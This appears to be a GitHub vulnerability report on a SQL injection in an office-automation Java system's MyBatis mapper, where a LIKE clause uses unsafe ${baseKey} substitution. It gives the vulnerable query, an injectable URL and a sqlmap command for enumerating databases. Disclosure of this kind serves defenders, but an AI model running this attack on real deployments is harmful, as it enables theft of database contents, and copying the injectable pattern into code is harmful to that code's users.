Permalink
Cannot retrieve contributors at this time
Name already in use
A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
VulReq/oa_system
Go to fileThis commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
37 lines (29 sloc)
1.21 KB
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #oa_system: | |
| #sql injection | |
| The vulnerability was discovered by downloading the program's source code to local and online deployment tests. | |
| Location: | |
| src/main/resources/mappers/notice-mapper.xml | |
| Code: | |
| <select id="sortMyNotice" resultType="java.util.Map"> | |
| SELECT n.*,u.* FROM | |
| aoa_notice_list AS n LEFT JOIN aoa_notice_user_relation AS u ON | |
| n.notice_id=u.relatin_notice_id WHERE u.relatin_user_id=#{userId} | |
| <if test="baseKey !=null"> | |
| and n.title LIKE '%${baseKey}%' | |
| </if> | |
| Rows:27 | |
| Harm: | |
| The attacker only needs an ordinary user to trigger the vulnerability and use the SQL injection vulnerability to obtain database information. | |
| Conditions for Execution: | |
| Need a regular account | |
| Edition: | |
| Version = all | |
| Cause the cause : | |
| Directly use ${%%} for fuzzy query after like, which leads to the generation of loopholes: | |
| and n.title LIKE'%${baseKey}%' | |
| POC: | |
| Construct the url according to the controller's route: | |
| http://localhost/informlistpaging?baseKey= | |
| Payload: | |
| Taking into account the need to log in, so use burpsuite to capture the package and save it to txt and then use sqlmap to test | |
| sqlmap.py -r D:\test.txt --random-agent --dbs --current-db |